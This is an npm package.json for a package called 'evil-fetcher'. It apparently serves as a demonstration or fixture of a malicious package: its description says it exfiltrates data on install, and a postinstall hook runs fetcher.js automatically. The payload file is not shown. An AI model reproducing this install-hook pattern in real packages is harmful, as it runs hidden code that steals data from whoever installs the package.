{
  "name": "evil-fetcher",
  "version": "1.0.0",
  "description": "A “harmless” utility that actually exfiltrates data on install",
  "main": "fetcher.js",
  "scripts": {
    "postinstall": "node fetcher.js"
  },
  "dependencies": {
    "node-fetch": "^2.6.1"
  }
}
